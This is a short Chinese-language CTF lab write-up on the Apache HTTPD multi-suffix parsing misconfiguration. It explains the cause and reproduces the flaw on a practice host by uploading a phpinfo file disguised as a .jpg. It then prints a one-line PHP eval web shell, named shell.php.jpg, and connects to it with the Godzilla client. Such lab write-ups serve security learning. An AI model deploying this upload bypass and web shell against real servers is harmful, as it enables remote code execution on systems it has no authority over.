1、漏洞描述
该漏洞并不是Apache软件本身的问题,漏洞与用户的配置有密切的关系,属于用户的配置问题。Apache文件解析漏洞涉及到一个Apache解析文件的特性,Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别。
如果用户给.php后缀的文件添加了处理程序 AddHandler application/x-httpd-php .php
那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为php文件进行解析。
2、实验环境
3、开启环境
浏览器访问得到以下结果
4、漏洞复现
经过多次上传尝试,发现靶场限制了只能上传jpg、png、gif文件
利用Apache解析文件的特性,自己手写一个php文件,命名为phpinfo.php.jpg
<?php
phpinfo();
?>
尝试上传并访问文件位置http://node4.anna.nssctf.cn:28128/uploadfiles/phpinfo.php.jpg
发现phpinfo.php.jpg
文件被成功解析,证实了该环境存在Apache HTTPD 多后缀解析漏洞
5、漏洞利用
第一步:写shell并上传
写一个shell文件上传,命名为shell.php.jpg
<?php
eval($_POST["cmd"]);
第二步:get shell
使用godzilla get shell(http://node4.anna.nssctf.cn:28128/uploadfiles/shell.php.jpg)